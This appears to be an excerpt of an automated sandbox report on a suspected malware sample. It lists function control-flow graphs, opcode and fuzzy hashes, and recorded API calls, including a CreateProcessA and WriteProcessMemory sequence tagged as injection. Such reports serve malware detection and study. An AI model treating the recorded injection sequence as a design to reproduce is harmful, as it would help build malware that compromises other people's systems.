35125->35133 35138 7e412f0 35125->35138 35126 7e412ce 35126->35110 35131 7e412e0 DrawTextExW 35129->35131 35132 7e412f0 DrawTextExW 35129->35132 35130 7e412ce 35130->35110 35131->35130 35132->35130 35134 7e412f0 35133->35134 35135 7e4134e 35134->35135 35143 7e41360 35134->35143 35148 7e41370 35134->35148 35135->35126 35139 7e41321 35138->35139 35140 7e4134e 35139->35140 35141 7e41360 DrawTextExW 35139->35141 35142 7e41370 DrawTextExW 35139->35142 35140->35126 35141->35140 35142->35140 35145 7e41391 35143->35145 35144 7e413a6 35144->35135 35145->35144 35153 7e40cac 35145->35153 35147 7e41411 35150 7e41391 35148->35150 35149 7e413a6 35149->35135 35150->35149 35151 7e40cac DrawTextExW 35150->35151 35152 7e41411 35151->35152 35155 7e40cb7 35153->35155 35154 7e42fd9 35154->35147 35155->35154 35159 7e43f60 35155->35159 35162 7e43f4f 35155->35162 35156 7e430ec 35156->35147 35165 7e4329c 35159->35165 35163 7e43f7d 35162->35163 35164 7e4329c DrawTextExW 35162->35164 35163->35156 35164->35163 35166 7e43f98 DrawTextExW 35165->35166 35168 7e43f7d 35166->35168 35168->35156 34900 305d0c0 34901 305d0c5 34900->34901 34905 305d699 34901->34905 34908 305d6a8 34901->34908 34902 305d1f3 34911 305d2fc 34905->34911 34909 305d6d6 34908->34909 34910 305d2fc DuplicateHandle 34908->34910 34909->34902 34910->34909 34912 305d710 DuplicateHandle 34911->34912 34914 305d6d6 34912->34914 34914->34902 35190 305ad30 35193 305ae28 35190->35193 35191 305ad3f 35194 305ae5c 35193->35194 35196 305ae39 35193->35196 35194->35191 35195 305b060 GetModuleHandleW 35197 305b08d 35195->35197 35196->35194 35196->35195 35197->35191 35169 3054668 35170 305467a 35169->35170 35171 3054686 35170->35171 35173 3054779 35170->35173 35174 305479d 35173->35174 35178 3054878 35174->35178 35182 3054888 35174->35182 35180 3054888 35178->35180 35179 305498c 35180->35179 35186 30544b0 35180->35186 35184 30548af 35182->35184 35183 305498c 35184->35183 35185 30544b0 CreateActCtxA 35184->35185 35185->35183 35187 3055918 CreateActCtxA 35186->35187 35189 30559db 35187->35189

                                                                                                                                        Executed Functions

                                                                                                                                        Function 07E4AA60 Relevance: 7.3, Strings: 5, Instructions: 1028COMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 294 7e4aa60-7e4aa81 295 7e4aa83 294->295 296 7e4aa88-7e4ab74 294->296 295->296 298 7e4b3a3-7e4b3cb 296->298 299 7e4ab7a-7e4acce 296->299 302 7e4baac-7e4bab5 298->302 343 7e4acd4-7e4ad2f 299->343 344 7e4b371-7e4b3a0 299->344 303 7e4b3d9-7e4b3e2 302->303 304 7e4babb-7e4bad2 302->304 306 7e4b3e4 303->306 307 7e4b3e9-7e4b4dd 303->307 306->307 325 7e4b507 307->325 326 7e4b4df-7e4b4eb 307->326 328 7e4b50d-7e4b52d 325->328 329 7e4b4f5-7e4b4fb 326->329 330 7e4b4ed-7e4b4f3 326->330 335 7e4b58d-7e4b605 328->335 336 7e4b52f-7e4b55d 328->336 332 7e4b505 329->332 330->332 332->328 354 7e4b607-7e4b65a 335->354 355 7e4b65c-7e4b69f 335->355 342 7e4b569-7e4b588 336->342 349 7e4baa9 342->349 352 7e4ad34-7e4ad3f 343->352 353 7e4ad31 343->353 344->298 349->302 356 7e4b283-7e4b289 352->356 353->352 380 7e4b6aa-7e4b6b0 354->380 355->380 358 7e4ad44-7e4ad62 356->358 359 7e4b28f-7e4b30c 356->359 361 7e4ad64-7e4ad68 358->361 362 7e4adb9-7e4adce 358->362 398 7e4b35b-7e4b361 359->398 361->362 367 7e4ad6a-7e4ad75 361->367 364 7e4add5-7e4adeb 362->364 365 7e4add0 362->365 371 7e4adf2-7e4ae09 364->371 372 7e4aded 364->372 365->364 368 7e4adab-7e4adb1 367->368 373 7e4ad77-7e4ad7b 368->373 374 7e4adb3-7e4adb4 368->374 375 7e4ae10-7e4ae26 371->375 376 7e4ae0b 371->376 372->371 378 7e4ad81-7e4ad99 373->378 379 7e4ad7d 373->379 383 7e4ae37-7e4aea8 374->383 381 7e4ae2d-7e4ae34 375->381 382 7e4ae28 375->382 376->375 386 7e4ada0-7e4ada8 378->386 387 7e4ad9b 378->387 379->378 388 7e4b707-7e4b713 380->388 381->383 382->381 389 7e4aebe-7e4b036 383->389 390 7e4aeaa 383->390 386->368 387->386 392 7e4b715-7e4b79b 388->392 393 7e4b6b2-7e4b6d4 388->393 399 7e4b04c-7e4b187 389->399 400 7e4b038 389->400 390->389 391 7e4aeac-7e4aeb8 390->391 391->389 422 7e4b920-7e4b929 392->422 395 7e4b6d6 393->395 396 7e4b6db-7e4b704 393->396 395->396 396->388 403 7e4b363-7e4b369 398->403 404 7e4b30e-7e4b358 398->404 412 7e4b189-7e4b18d 399->412 413 7e4b1eb-7e4b200 399->413 400->399 405 7e4b03a-7e4b046 400->405 403->344 404->398 405->399 412->413 415 7e4b18f-7e4b19e 412->415 417 7e4b207-7e4b228 413->417 418 7e4b202 413->418 421 7e4b1dd-7e4b1e3 415->421 419 7e4b22f-7e4b24e 417->419 420 7e4b22a 417->420 418->417 426 7e4b255-7e4b275 419->426 427 7e4b250 419->427 420->419 428 7e4b1e5-7e4b1e6 421->428 429 7e4b1a0-7e4b1a4 421->429 424 7e4b7a0-7e4b7b5 422->424 425 7e4b92f-7e4b988 422->425 432 7e4b7b7 424->432 433 7e4b7be-7e4b914 424->433 451 7e4b9bf-7e4b9e9 425->451 452 7e4b98a-7e4b9bd 425->452 434 7e4b277 426->434 435 7e4b27c 426->435 427->426 436 7e4b280 428->436 430 7e4b1a6-7e4b1aa 429->430 431 7e4b1ae-7e4b1cf 429->431 430->431 438 7e4b1d6-7e4b1da 431->438 439 7e4b1d1 431->439 432->433 440 7e4b7c4-7e4b804 432->440 441 7e4b893-7e4b8d3 432->441 442 7e4b84e-7e4b88e 432->442 443 7e4b809-7e4b849 432->443 453 7e4b91a 433->453 434->435 435->436 436->356 438->421 439->438 440->453 441->453 442->453 443->453 460 7e4b9f2-7e4ba9d 451->460 452->460 453->422 460->349
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1702447336.0000000007E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E40000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_7e40000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: 4'kq$TJpq$Tekq$poq$xbnq
                                                                                                                                        • API String ID: 0-2301093937
                                                                                                                                        • Opcode ID: 7028fbd7882038b6418cafaac3c1aac824d00ee8c8dc9df43ac1eca6d635abfa
                                                                                                                                        • Instruction ID: 905d4a1f3d3350fa08b6cd42ee96ac3d87c14438a0a4c8b718f651f355652c09
                                                                                                                                        • Opcode Fuzzy Hash: 7028fbd7882038b6418cafaac3c1aac824d00ee8c8dc9df43ac1eca6d635abfa
                                                                                                                                        • Instruction Fuzzy Hash: 70B2C5B5E01228CFDB54CF69C984AD9BBB2FF89304F1581E9D509AB265DB319E81CF40
                                                                                                                                        Function 07E4A7B8 Relevance: 1.4, Strings: 1, Instructions: 180COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1702447336.0000000007E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E40000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_7e40000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: 4'kq
                                                                                                                                        • API String ID: 0-3255046985
                                                                                                                                        • Opcode ID: 2d79f17c03c9e20dd0267c66f6e5413524ec614351a30b219eb5b6b545e0ebbb
                                                                                                                                        • Instruction ID: 4ea0fc76e0d3ee12b7eef3aee90e7f240cd0c031e6492e18690b61832b95942e
                                                                                                                                        • Opcode Fuzzy Hash: 2d79f17c03c9e20dd0267c66f6e5413524ec614351a30b219eb5b6b545e0ebbb
                                                                                                                                        • Instruction Fuzzy Hash: DD714EB1A152099FDB08DF7AE94569ABFF2FBC8300F14D429D418973A8EF345A45CB80
                                                                                                                                        Function 0730AA58 Relevance: .6, Instructions: 623COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1700679136.0000000007300000.00000040.00000800.00020000.00000000.sdmp, Offset: 07300000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_7300000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 28f1c39022592e799a2de79e55d68535d6c2764b2ef16b0b97499b282b624793
                                                                                                                                        • Instruction ID: deb83fdde42dab370b3b79f2a71f8b6f1d4486c87e2929bef8a141e2149c33e7
                                                                                                                                        • Opcode Fuzzy Hash: 28f1c39022592e799a2de79e55d68535d6c2764b2ef16b0b97499b282b624793
                                                                                                                                        • Instruction Fuzzy Hash: A232ACB5B023058FEB15DB69D460BAEBBF6AF89300F148469E509DB3A0CB35DD01CB91
                                                                                                                                        Function 07E4D708 Relevance: .2, Instructions: 239COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1702447336.0000000007E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E40000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_7e40000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 4da093d309f5fd202c283830ae2b8e48e4314e6e2d69349ba5d0787a80c937f7
                                                                                                                                        • Instruction ID: 50949c0c6f1203e3bbb2017985fa19fb85b576b8f75a3c19f867c9d07f9e59e4
                                                                                                                                        • Opcode Fuzzy Hash: 4da093d309f5fd202c283830ae2b8e48e4314e6e2d69349ba5d0787a80c937f7
                                                                                                                                        • Instruction Fuzzy Hash: CCA1F4B5E16228CFDB14CFA5E8447EDBBF6BF8A300F10A0A9D509AB251DB745985CF40
                                                                                                                                        Function 07E4D707 Relevance: .2, Instructions: 228COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1702447336.0000000007E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E40000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_7e40000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 727e1e7ee710f352dfcdbb0b66640d1a55009f9e655aa03854951a06f39bb210
                                                                                                                                        • Instruction ID: 87dd2b61eaecc1a9a7134770a1f9ff6a7021f3a02c983c56f36ab65b7faecf48
                                                                                                                                        • Opcode Fuzzy Hash: 727e1e7ee710f352dfcdbb0b66640d1a55009f9e655aa03854951a06f39bb210
                                                                                                                                        • Instruction Fuzzy Hash: 7791F5B5E06229CFDB14CFA5E8447EDBBF2BF89300F10A0A9D509AB251DB745985CF40
                                                                                                                                        Function 07E4DCFE Relevance: .2, Instructions: 216COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1702447336.0000000007E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E40000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_7e40000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 3f0a85630afbb260751abf00f8d2c0e88a76bc05dcd27d64be559ee6ae68a1d8
                                                                                                                                        • Instruction ID: 86fd416cb816bab6e978985dbc382ba449737908db1fe970cd31fe5a1bc84534
                                                                                                                                        • Opcode Fuzzy Hash: 3f0a85630afbb260751abf00f8d2c0e88a76bc05dcd27d64be559ee6ae68a1d8
                                                                                                                                        • Instruction Fuzzy Hash: 8381E6B4E0A218CFCB24CFA9E8846EDBBF5BF4A300F24A156D509A7316D7349981CF50
                                                                                                                                        Function 07E4DC1A Relevance: .1, Instructions: 86COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1702447336.0000000007E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E40000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_7e40000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: e9f74d9529656455a24672993a8dbf6f616b09a4cb96f2625ce92d72a80c371e
                                                                                                                                        • Instruction ID: 198f72b07db6ce67d1ecafa516ccadf1d7c6bb4084c8c865a51c0133836a8fb4
                                                                                                                                        • Opcode Fuzzy Hash: e9f74d9529656455a24672993a8dbf6f616b09a4cb96f2625ce92d72a80c371e
                                                                                                                                        • Instruction Fuzzy Hash: CB31C6B1E056188BDB18CFABE94469EFBF6AF89300F14D16AD918AB215EB705541CF40
                                                                                                                                        Function 07E4DC28 Relevance: .1, Instructions: 73COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1702447336.0000000007E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E40000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_7e40000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: f711dad65aa215ed77d0ff0f4f688c8c3ad42d76a3f5eb77b3e04035dcbaae9c
                                                                                                                                        • Instruction ID: 847b1b569738ce8d27033ffd3086b6703408ba15afd5957f47454845bbda277d
                                                                                                                                        • Opcode Fuzzy Hash: f711dad65aa215ed77d0ff0f4f688c8c3ad42d76a3f5eb77b3e04035dcbaae9c
                                                                                                                                        • Instruction Fuzzy Hash: A231A2B1E056188BEB18CFABD84469EFAF3AFC8300F14D16AD818A7225EB305541CF54
                                                                                                                                        Function 0730799C Relevance: 1.7, APIs: 1, Instructions: 249processCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 579 730799c-7307a3d 582 7307a76-7307a96 579->582 583 7307a3f-7307a49 579->583 588 7307a98-7307aa2 582->588 589 7307acf-7307afe 582->589 583->582 584 7307a4b-7307a4d 583->584 586 7307a70-7307a73 584->586 587 7307a4f-7307a59 584->587 586->582 590 7307a5b 587->590 591 7307a5d-7307a6c 587->591 588->589 593 7307aa4-7307aa6 588->593 599 7307b00-7307b0a 589->599 600 7307b37-7307bf1 CreateProcessA 589->600 590->591 591->591 592 7307a6e 591->592 592->586 594 7307aa8-7307ab2 593->594 595 7307ac9-7307acc 593->595 597 7307ab4 594->597 598 7307ab6-7307ac5 594->598 595->589 597->598 598->598 602 7307ac7 598->602 599->600 601 7307b0c-7307b0e 599->601 611 7307bf3-7307bf9 600->611 612 7307bfa-7307c80 600->612 603 7307b10-7307b1a 601->603 604 7307b31-7307b34 601->604 602->595 606 7307b1c 603->606 607 7307b1e-7307b2d 603->607 604->600 606->607 607->607 608 7307b2f 607->608 608->604 611->612 622 7307c90-7307c94 612->622 623 7307c82-7307c86 612->623 625 7307ca4-7307ca8 622->625 626 7307c96-7307c9a 622->626 623->622 624 7307c88 623->624 624->622 628 7307cb8-7307cbc 625->628 629 7307caa-7307cae 625->629 626->625 627 7307c9c 626->627 627->625 630 7307cce-7307cd5 628->630 631 7307cbe-7307cc4 628->631 629->628 632 7307cb0 629->632 633 7307cd7-7307ce6 630->633 634 7307cec 630->634 631->630 632->628 633->634 636 7307ced 634->636 636->636
                                                                                                                                        APIs
                                                                                                                                        • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07307BDE
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1700679136.0000000007300000.00000040.00000800.00020000.00000000.sdmp, Offset: 07300000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_7300000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CreateProcess
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 963392458-0
                                                                                                                                        • Opcode ID: 6b07a72eef89a6db3fb6acfdc20dd52fee2306b2e264a6d8ec6bbba7d0009cb2
                                                                                                                                        • Instruction ID: 0b430673368281fb080185c8b6174e59231d74c05ccd64f98b7ff42f0520306f
                                                                                                                                        • Opcode Fuzzy Hash: 6b07a72eef89a6db3fb6acfdc20dd52fee2306b2e264a6d8ec6bbba7d0009cb2
                                                                                                                                        • Instruction Fuzzy Hash: 95A16DB1D0021ADFEF14CF68C8517DEBBB6BF44310F1485A9E849A7290DB74A985CF91
                                                                                                                                        Function 073079A8 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 637 73079a8-7307a3d 639 7307a76-7307a96 637->639 640 7307a3f-7307a49 637->640 645 7307a98-7307aa2 639->645 646 7307acf-7307afe 639->646 640->639 641 7307a4b-7307a4d 640->641 643 7307a70-7307a73 641->643 644 7307a4f-7307a59 641->644 643->639 647 7307a5b 644->647 648 7307a5d-7307a6c 644->648 645->646 650 7307aa4-7307aa6 645->650 656 7307b00-7307b0a 646->656 657 7307b37-7307bf1 CreateProcessA 646->657 647->648 648->648 649 7307a6e 648->649 649->643 651 7307aa8-7307ab2 650->651 652 7307ac9-7307acc 650->652 654 7307ab4 651->654 655 7307ab6-7307ac5 651->655 652->646 654->655 655->655 659 7307ac7 655->659 656->657 658 7307b0c-7307b0e 656->658 668 7307bf3-7307bf9 657->668 669 7307bfa-7307c80 657->669 660 7307b10-7307b1a 658->660 661 7307b31-7307b34 658->661 659->652 663 7307b1c 660->663 664 7307b1e-7307b2d 660->664 661->657 663->664 664->664 665 7307b2f 664->665 665->661 668->669 679 7307c90-7307c94 669->679 680 7307c82-7307c86 669->680 682 7307ca4-7307ca8 679->682 683 7307c96-7307c9a 679->683 680->679 681 7307c88 680->681 681->679 685 7307cb8-7307cbc 682->685 686 7307caa-7307cae 682->686 683->682 684 7307c9c 683->684 684->682 687 7307cce-7307cd5 685->687 688 7307cbe-7307cc4 685->688 686->685 689 7307cb0 686->689 690 7307cd7-7307ce6 687->690 691 7307cec 687->691 688->687 689->685 690->691 693 7307ced 691->693 693->693
                                                                                                                                        APIs
                                                                                                                                        • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07307BDE
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1700679136.0000000007300000.00000040.00000800.00020000.00000000.sdmp, Offset: 07300000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_7300000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CreateProcess
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 963392458-0
                                                                                                                                        • Opcode ID: 05e222fca4ef2a03da14499fc70d6ed1f919fe77e9c529c213851bffd0a808b3
                                                                                                                                        • Instruction ID: 8cf81ac011d64bb60b51525f65c47784af1476cf5a601a693df4270ba5541113
                                                                                                                                        • Opcode Fuzzy Hash: 05e222fca4ef2a03da14499fc70d6ed1f919fe77e9c529c213851bffd0a808b3
                                                                                                                                        • Instruction Fuzzy Hash: F2916EB1D0021ADFEF14CF68C8517DEBBB2BF48310F1485A9E849A7290DB74A985CF91
                                                                                                                                        Function 0305AE28 Relevance: 1.7, APIs: 1, Instructions: 198COMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 694 305ae28-305ae37 695 305ae63-305ae67 694->695 696 305ae39-305ae46 call 305a14c 694->696 697 305ae69-305ae73 695->697 698 305ae7b-305aebc 695->698 703 305ae5c 696->703 704 305ae48 696->704 697->698 705 305aebe-305aec6 698->705 706 305aec9-305aed7 698->706 703->695 752 305ae4e call 305b0b0 704->752 753 305ae4e call 305b0c0 704->753 705->706 708 305aed9-305aede 706->708 709 305aefb-305aefd 706->709 707 305ae54-305ae56 707->703 710 305af98-305afaf 707->710 712 305aee0-305aee7 call 305a158 708->712 713 305aee9 708->713 711 305af00-305af07 709->711 727 305afb1-305b010 710->727 715 305af14-305af1b 711->715 716 305af09-305af11 711->716 714 305aeeb-305aef9 712->714 713->714 714->711 718 305af1d-305af25 715->718 719 305af28-305af31 call 305a168 715->719 716->715 718->719 725 305af33-305af3b 719->725 726 305af3e-305af43 719->726 725->726 728 305af45-305af4c 726->728 729 305af61-305af6e 726->729 745 305b012-305b058 727->745 728->729 730 305af4e-305af5e call 305a178 call 305a188 728->730 735 305af91-305af97 729->735 736 305af70-305af8e 729->736 730->729 736->735 747 305b060-305b08b GetModuleHandleW 745->747 748 305b05a-305b05d 745->748 749 305b094-305b0a8 747->749 750 305b08d-305b093 747->750 748->747 750->749 752->707 753->707
                                                                                                                                        APIs
                                                                                                                                        • GetModuleHandleW.KERNELBASE(00000000), ref: 0305B07E
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1697354167.0000000003050000.00000040.00000800.00020000.00000000.sdmp, Offset: 03050000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_3050000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: HandleModule
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 4139908857-0
                                                                                                                                        • Opcode ID: d3d73ee530cb2545032b9db72f7b64a6b6f79297d43c15dda02a22321ac60482
                                                                                                                                        • Instruction ID: 2973f583e0cd4f8e9f1fea1c5104db22c0aacdb6e8bf29d912480df5a2142f1f
                                                                                                                                        • Opcode Fuzzy Hash: d3d73ee530cb2545032b9db72f7b64a6b6f79297d43c15dda02a22321ac60482
                                                                                                                                        • Instruction Fuzzy Hash: 2F7145B0A01B058FDB65DF69D44479BBBF5FF88300F048A29E88AD7A50DB34E845CB95
                                                                                                                                        Function 0305590C Relevance: 1.6, APIs: 1, Instructions: 98COMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 754 305590c-3055914 755 3055918-30559d9 CreateActCtxA 754->755 757 30559e2-3055a3c 755->757 758 30559db-30559e1 755->758 765 3055a3e-3055a41 757->765 766 3055a4b-3055a4f 757->766 758->757 765->766 767 3055a51-3055a5d 766->767 768 3055a60 766->768 767->768 770 3055a61 768->770 770->770
                                                                                                                                        APIs
                                                                                                                                        • CreateActCtxA.KERNEL32(?), ref: 030559C9
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1697354167.0000000003050000.00000040.00000800.00020000.00000000.sdmp, Offset: 03050000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_3050000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Create
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2289755597-0
                                                                                                                                        • Opcode ID: a21822987088fcba301cd1e998ce8065d5abe1e8d9e8b8a8fd229063f6cab6a0
                                                                                                                                        • Instruction ID: 36fa20294abcaed711b151c80ec3a9ce210b376ce526ab2abf8b959df6ec8d17
                                                                                                                                        • Opcode Fuzzy Hash: a21822987088fcba301cd1e998ce8065d5abe1e8d9e8b8a8fd229063f6cab6a0
                                                                                                                                        • Instruction Fuzzy Hash: AF4102B0C01619CBCB24CFA9C884B8EBBF5BF49304F24805AE409AB251DB756946CF90
                                                                                                                                        Function 030544B0 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 771 30544b0-30559d9 CreateActCtxA 774 30559e2-3055a3c 771->774 775 30559db-30559e1 771->775 782 3055a3e-3055a41 774->782 783 3055a4b-3055a4f 774->783 775->774 782->783 784 3055a51-3055a5d 783->784 785 3055a60 783->785 784->785 787 3055a61 785->787 787->787
                                                                                                                                        APIs
                                                                                                                                        • CreateActCtxA.KERNEL32(?), ref: 030559C9
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1697354167.0000000003050000.00000040.00000800.00020000.00000000.sdmp, Offset: 03050000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_3050000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Create
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2289755597-0
                                                                                                                                        • Opcode ID: fc242ed383590be8ac0ab7cc229fc4ce9114cddb6e8203e2f6d0f78541e24771
                                                                                                                                        • Instruction ID: 3f293fc33b8c2f0c5a4e894ced5f739575c3b441fcdf4aa797b40352027111f4
                                                                                                                                        • Opcode Fuzzy Hash: fc242ed383590be8ac0ab7cc229fc4ce9114cddb6e8203e2f6d0f78541e24771
                                                                                                                                        • Instruction Fuzzy Hash: 3F41F2B0C01619CBDB24CFA9C88478EBBF5BF49304F24806AE409AB255DB756945CF90
                                                                                                                                        Function 07E4329C Relevance: 1.6, APIs: 1, Instructions: 72COMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 798 7e4329c-7e43fe4 800 7e43fe6-7e43fec 798->800 801 7e43fef-7e43ffe 798->801 800->801 802 7e44000 801->802 803 7e44003-7e4403c DrawTextExW 801->803 802->803 804 7e44045-7e44062 803->804 805 7e4403e-7e44044 803->805 805->804
                                                                                                                                        APIs
                                                                                                                                        • DrawTextExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,07E43F7D,?,?), ref: 07E4402F
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1702447336.0000000007E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E40000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_7e40000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: DrawText
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2175133113-0
                                                                                                                                        • Opcode ID: b731bda0be99650204af5bcec3071f8ba6da8a5e5652b15b22fe56b5deb44b08
                                                                                                                                        • Instruction ID: 20f56caf19916a4bd0fbe8a71fdba5f4b0da741569b5b46c7b7a4ab45c0e916b
                                                                                                                                        • Opcode Fuzzy Hash: b731bda0be99650204af5bcec3071f8ba6da8a5e5652b15b22fe56b5deb44b08
                                                                                                                                        • Instruction Fuzzy Hash: 4431E0B59013499FCB10CF9AE884ADEBBF5EB48324F14842AE919A7350D775A950CFA0
                                                                                                                                        Function 07307718 Relevance: 1.6, APIs: 1, Instructions: 72injectionCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 788 7307718-730776e 790 7307770-730777c 788->790 791 730777e-73077bd WriteProcessMemory 788->791 790->791 793 73077c6-73077f6 791->793 794 73077bf-73077c5 791->794 794->793
                                                                                                                                        APIs
                                                                                                                                        • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 073077B0
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1700679136.0000000007300000.00000040.00000800.00020000.00000000.sdmp, Offset: 07300000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_7300000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MemoryProcessWrite
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3559483778-0
                                                                                                                                        • Opcode ID: 34118209074553554ec8815b1332a372582ba57929cdfb3b07c003ed88b7d922
                                                                                                                                        • Instruction ID: 843f35803e11e3e838b6aab762e95eecebf495b7b73938f6bda9de70c65fed40
                                                                                                                                        • Opcode Fuzzy Hash: 34118209074553554ec8815b1332a372582ba57929cdfb3b07c003ed88b7d922
